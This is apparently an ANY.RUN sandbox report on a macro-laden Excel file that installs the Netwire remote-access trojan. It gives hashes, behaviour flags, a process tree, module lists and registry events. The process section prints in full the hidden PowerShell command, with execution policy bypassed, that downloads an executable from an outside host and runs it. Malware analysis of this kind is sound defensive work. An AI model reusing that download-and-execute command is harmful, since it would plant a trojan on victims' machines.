General Info

File name

LetterofIntent-Eckharthelicopter.xls

Full analysis
https://app.any.run/tasks/398235d6-6d1a-465e-b96b-52122be095e1
Verdict
Malicious activity
Threats:

Netwire is an advanced RAT — it is a malware that takes control of infected PCs and allows its operators to perform various actions. Unlike many RATs, this one can target every major operating system, including Windows, Linux, and MacOS.

Analysis date
7/24/2020, 20:54:59
OS:
Windows 10 Professional (build: 16299, 64 bit)
Tags:

macros

macros-on-open

loader

trojan

netwire

rat

Indicators:

MIME:
application/vnd.ms-excel
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: DAZED, Last Saved By: DAZED, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jul 24 16:01:52 2020, Last Saved Time/Date: Fri Jul 24 16:06:33 2020, Security: 0
MD5

6cb7256dde8c6cf09fc82b7f75fd18ad

SHA1

9b5bb3f2fda7a6e316a210942d0d65d1e877761d

SHA256

2cb072d9fcc9413a91b245513366c7bb52bfec2638f67c158520c2854e264208

SSDEEP

12288:huj3HVAQHVxSCyGnOsDRGzg5Bi0nvGfqTuRJwWJsZSk9A+oMD1L0Nc:UXVAQ1xSp8IzgSgvqRJwWJsZSoywL0S

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
660 seconds
Additional time used
none
Fakenet option
off
Heavy Evasion option
off
MITM proxy
on
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 11.431.16299.0 KB4103768
  • Adobe Acrobat Reader DC MUI (15.007.20033)
  • CCleaner (5.35)
  • FileZilla Client 3.31.0 (3.31.0)
  • Google Chrome (73.0.3683.86)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (64-bit) (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft Office Professional 2019 - de-de (16.0.12026.20264)
  • Microsoft Office Professional 2019 - en-us (16.0.12026.20264)
  • Microsoft Office Professional 2019 - es-es (16.0.12026.20264)
  • Microsoft Office Professional 2019 - it-it (16.0.12026.20264)
  • Microsoft Office Professional 2019 - ja-jp (16.0.12026.20264)
  • Microsoft Office Professional 2019 - ko-kr (16.0.12026.20264)
  • Microsoft Office Professional 2019 - pt-br (16.0.12026.20264)
  • Microsoft Office Professional 2019 - tr-tr (16.0.12026.20264)
  • Microsoft Office Professionnel 2019 - fr-fr (16.0.12026.20264)
  • Microsoft Office профессиональный 2019 - ru-ru (16.0.12026.20264)
  • Microsoft Visual C++ 2017 Redistributable (x64) - 14.11.25325 (14.11.25325.0)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.11.25325 (14.11.25325.0)
  • Microsoft Visual C++ 2017 x64 Additional Runtime - 14.11.25325 (14.11.25325)
  • Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.11.25325 (14.11.25325)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.11.25325 (14.11.25325)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.11.25325 (14.11.25325)
  • Mozilla Firefox 65.0.2 (x64 en-US) (65.0.2)
  • Notepad++ (64-bit x64) (7.5.1)
  • Office 16 Click-to-Run Extensibility Component (16.0.12026.20264)
  • Office 16 Click-to-Run Licensing Component (16.0.12026.20264)
  • Office 16 Click-to-Run Localization Component (16.0.12026.20264)
  • Opera 12.15 (12.15.1748)
  • QGA (2.10.81)
  • Skype™ 7.39 (7.39.102)
  • Update for Windows 10 for x64-based Systems (KB4023057) (2.19.0.0)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (64-bit) (5.60.0)
  • Windows 10 Upgrade Assistant (1.4.9200.22175)

Hotfixes

  • Client LanguagePack Package
  • Foundation Package
  • InternetExplorer Optional Package
  • KB4054022
  • KB4055237
  • KB4055994
  • KB4058043
  • KB4078408
  • KB4093110
  • KB4094276
  • KB4103729
  • KB4131372
  • KB4134661
  • LanguageFeatures Basic en us Package
  • LanguageFeatures Handwriting en us Package
  • LanguageFeatures OCR en us Package
  • LanguageFeatures Speech en us Package
  • LanguageFeatures TextToSpeech en us Package
  • MediaPlayer Package
  • Microsoft OneCore ApplicationModel Sync Desktop FOD Package
  • NetFx3 OnDemand Package
  • ProfessionalEdition
  • QuickAssist Package
  • RollupFix

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • solute.exe (PID: 2752)
  • solu.exe (PID: 1740)
Executes PowerShell scripts
  • cmd.exe (PID: 72)
Starts CMD.EXE for commands execution
  • EXCEL.EXE (PID: 4580)
Downloads executable files from the Internet
  • powershell.exe (PID: 1948)
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 4580)
Changes the autorun value in the registry
  • solu.exe (PID: 1740)
Connects to CnC server
  • solu.exe (PID: 1740)
NETWIRE was detected
  • solu.exe (PID: 1740)
Executable content was dropped or overwritten
  • powershell.exe (PID: 1948)
  • solute.exe (PID: 2752)
Reads Environment values
  • powershell.exe (PID: 1948)
Reads the machine GUID from the registry
  • powershell.exe (PID: 1948)
Creates files in the user directory
  • solute.exe (PID: 2752)
Starts itself from another location
  • solute.exe (PID: 2752)
Reads settings of System Certificates
  • EXCEL.EXE (PID: 4580)
  • powershell.exe (PID: 1948)
Reads the software policy settings
  • powershell.exe (PID: 1948)
  • EXCEL.EXE (PID: 4580)
Reads Environment values
  • EXCEL.EXE (PID: 4580)
Creates files in the user directory
  • EXCEL.EXE (PID: 4580)
Reads the machine GUID from the registry
  • EXCEL.EXE (PID: 4580)
Scans artifacts that could help determine the target
  • EXCEL.EXE (PID: 4580)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 4580)

Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report.

Static information

TRiD
.xls: Microsoft Excel sheet (48%)
.xls: Microsoft Excel sheet (alternate) (39.2%)
EXIF
FlashPix
CompObjUserType:
Microsoft Excel 2003 Worksheet
CompObjUserTypeLen:
31
HeadingPairs
null
null
TitleOfParts:
Sheet1
HyperlinksChanged:
No
SharedDoc:
No
LinksUpToDate:
No
ScaleCrop:
No
AppVersion:
16
Company:
null
CodePage:
Windows Latin 1 (Western European)
Security:
None
ModifyDate:
2020:07:24 15:06:33
CreateDate:
2020:07:24 15:01:52
Software:
Microsoft Excel
LastModifiedBy:
DAZED
Author:
DAZED

Processes

Total processes
93
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Behavior graph (rendered as an image in the original report; the process chain below is recovered from its labels): excel.exe starts cmd.exe (no specs), which starts conhost.exe and powershell.exe; powershell.exe drops and starts solute.exe, which in turn drops and starts solu.exe (#NETWIRE).

Process information

PID
4580
CMD
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\LetterofIntent-Eckharthelicopter.xls"
Path
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
16.0.12026.20264
Modules
Image
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\shell32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\profapi.dll
c:\program files\microsoft office\root\office16\excel.exe
c:\windows\system32\userenv.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\win32u.dll
c:\windows\system32\cfgmgr32.dll
c:\systemroot\system32\ntdll.dll
c:\windows\system32\dwmapi.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso50win32client.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.16299.431_none_46b2c6d3edf81841\gdiplus.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso30win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso40uiwin32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso20win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso98win32client.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\d2d1.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso.dll
c:\windows\system32\winsta.dll
c:\windows\system32\d3d10warp.dll
c:\windows\system32\msctf.dll
c:\windows\system32\resourcepolicyclient.dll
c:\windows\system32\dwrite.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\msvcp110_win.dll
c:\program files\microsoft office\root\office16\msoaria.dll
c:\windows\system32\imagehlp.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\riched20.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\msiso.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dsreg.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\ncrypt.dll
c:\program files\common files\microsoft shared\clicktorun\c2r64.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\version.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\secur32.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\rmclient.dll
c:\windows\system32\ncryptsslp.dll
c:\windows\system32\coreuicomponents.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\fwpuclnt.dll
c:\program files\microsoft office\root\office16\oart.dll
c:\program files\microsoft office\root\office16\msohev.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cldapi.dll
c:\windows\system32\dpapi.dll
c:\windows\system32\explorerframe.dll
c:\program files\microsoft office\root\office16\gkexcel.dll
c:\program files\microsoft office\root\office16\gfx.dll
c:\windows\system32\dcomp.dll
c:\windows\system32\slc.dll
c:\windows\system32\dataexchange.dll
c:\windows\system32\globinputhost.dll
c:\windows\system32\bcp47langs.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\root\vfs\system\msvcr100.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll
c:\windows\system32\srpapi.dll
c:\windows\system32\windows.security.authentication.onlineid.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\d3dcompiler_47.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\windows.security.authentication.web.core.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\nsi.dll
c:\windows\system32\twinapi.appcore.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\npmproxy.dll
c:\windows\system32\wininet.dll
c:\windows\system32\netutils.dll
c:\windows\system32\xmllite.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\adal.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\webio.dll
c:\windows\system32\wintypes.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\sppc.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\twinapi.dll
c:\windows\system32\textinputframework.dll
c:\windows\system32\coremessaging.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\aepic.dll
c:\windows\system32\windows.staterepositoryps.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\sechost.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\imm32.dll
c:\windows\system32\onecorecommonproxystub.dll
c:\windows\system32\elscore.dll
c:\windows\system32\mpr.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\propsys.dll
c:\windows\system32\coml2.dll
c:\windows\system32\mlang.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\1033\vbe7intl.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\directmanipulation.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\usp10.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll
c:\windows\system32\d3d10_1.dll
c:\windows\system32\d3d10_1core.dll
c:\windows\system32\windows.globalization.dll
c:\windows\system32\sxs.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\msptls.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\onecoreuapcommonproxystub.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\windows.networking.connectivity.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\appresolver.dll
c:\windows\system32\webservices.dll

PID
72
CMD
cmd /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://hodrc.org/ot/solut.exe',$env:Temp+'\solute.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\solute.exe')
Path
C:\WINDOWS\SYSTEM32\cmd.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\cmd.exe
c:\windows\system32\kernelbase.dll
c:\systemroot\system32\ntdll.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\kernel32.dll

PID
3424
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\msvcp_win.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\imm32.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\win32u.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\conhost.exe
c:\windows\system32\gdi32.dll
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\wintypes.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\coreuicomponents.dll
c:\windows\system32\msctf.dll
c:\windows\system32\shcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\coremessaging.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\textinputframework.dll
c:\windows\system32\shell32.dll

PID
1948
CMD
powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://hodrc.org/ot/solut.exe',$env:Temp+'\solute.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\solute.exe')
Path
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\bcrypt.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\cryptsp.dll
c:\systemroot\system32\ntdll.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\ole32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\kernelbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\shlwapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\secur32.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\coml2.dll
c:\windows\system32\sechost.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\rsaenh.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\user32.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\system32\shcore.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\clbcatq.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\amsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\system32\powrprof.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\system32\userenv.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\wldp.dll
c:\windows\system32\msisip.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\wshext.dll
c:\windows\system32\urlmon.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\system32\rasman.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\msiso.dll
c:\windows\system32\windows.staterepositoryps.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\sxs.dll
c:\windows\system32\mpr.dll
c:\windows\system32\pcacli.dll
c:\windows\system32\edputil.dll
c:\windows\system32\cldapi.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\aepic.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\propsys.dll
c:\windows\system32\apphelp.dll

PID
2752
CMD
"C:\Users\admin\AppData\Local\Temp\solute.exe"
Path
C:\Users\admin\AppData\Local\Temp\solute.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
XACT Build Utility
Version
9.29 (DXSDK_JUN10.100602-0421)
Modules
Image
c:\users\admin\appdata\local\temp\solute.exe
c:\windows\system32\wow64win.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\msvcrt.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\syswow64\kernel32.dll
c:\systemroot\system32\ntdll.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\shcore.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\powrprof.dll
c:\windows\syswow64\gdi32full.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\windows.staterepositoryps.dll
c:\windows\syswow64\netutils.dll
c:\windows\syswow64\netapi32.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\ucrtbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\clbcatq.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\cldapi.dll
c:\windows\syswow64\imagehlp.dll
c:\windows\syswow64\msiso.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\ntmarta.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\edputil.dll
c:\windows\syswow64\aepic.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\kernel.appcore.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\win32u.dll
c:\windows\syswow64\msvcp_win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\combase.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\windows.storage.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\sspicli.dll
c:\windows\system32\wow64.dll
c:\windows\syswow64\fltlib.dll
c:\windows\syswow64\propsys.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\cfgmgr32.dll

PID
1740
CMD
"C:\Users\admin\AppData\Roaming\solu\solu.exe"
Path
C:\Users\admin\AppData\Roaming\solu\solu.exe
Indicators
Parent process
solute.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
XACT Build Utility
Version
9.29 (DXSDK_JUN10.100602-0421)
Modules
Image
c:\windows\syswow64\gdi32full.dll
c:\windows\syswow64\msvcp_win.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\kernel.appcore.dll
c:\windows\system32\wow64.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\advapi32.dll
c:\windows\system32\wow64win.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\ucrtbase.dll
c:\windows\syswow64\combase.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\windows.storage.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\shcore.dll
c:\systemroot\system32\ntdll.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\syswow64\powrprof.dll
c:\windows\syswow64\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
c:\users\admin\appdata\roaming\solu\solu.exe
c:\windows\syswow64\win32u.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\nlaapi.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\netutils.dll
c:\windows\syswow64\napinsp.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\winrnr.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\netapi32.dll
c:\windows\syswow64\pnrpnsp.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\cscapi.dll
c:\windows\syswow64\wkscli.dll

Registry activity

Total events
2869
Read events
0
Write events
268
Delete events
39

Modification events

PID
Process
Operation
Key
Name
Value
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{B866D7AE-7C99-4C20-AA98-278FC044FB98}
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\2629F457
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
4580
EXCEL.EXE
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\196\52C64B7E
LanguageList
en-US
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel
BuildNumber
16.0.12026
4580
EXCEL.EXE
write
